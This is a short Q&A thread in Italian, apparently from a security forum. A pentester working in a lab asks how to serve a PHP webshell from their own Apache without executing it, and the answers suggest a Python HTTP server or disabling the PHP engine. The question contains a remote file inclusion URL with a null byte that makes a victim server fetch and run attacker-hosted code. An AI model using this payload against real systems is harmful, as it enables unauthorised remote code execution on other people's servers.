Fornire un webshell php senza eseguirlo localmente

6

Sto usando Kali Linux in un laboratorio di pentesting.

Inserendo il seguente URL sul sistema della vittima posso ottenere l'accesso al mio server Apache (vedo una risposta di 200 accessi nei miei registri), ma il file php viene visualizzato sul mio sistema e quindi ho generato una webshell sul mio scatola:

https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00

In che modo "modifica l'associazione" in apache per impedirne l'esecuzione? Cambiarlo in .txt sembra impedirgli di girare su entrambi sistemi; non sono sicuro di poter iniettarlo in questo modo .

    
posta Shrout1 23.12.2016 - 21:09
fonte

2 risposte

4

python -m SimpleHTTPServer 80

ti genererà un semplice server http che non è php, il modo più veloce per imho

    
risposta data 24.12.2016 - 01:21
fonte
7

Utilizza la seguente impostazione nella tua configurazione di apache o in un file .htaccess:

php_flag engine off

Vedi anche Disabilita PHP nella directory (incluso tutto sottodirectory) con .htaccess .

    
risposta data 23.12.2016 - 21:57
fonte

Leggi altre domande sui tag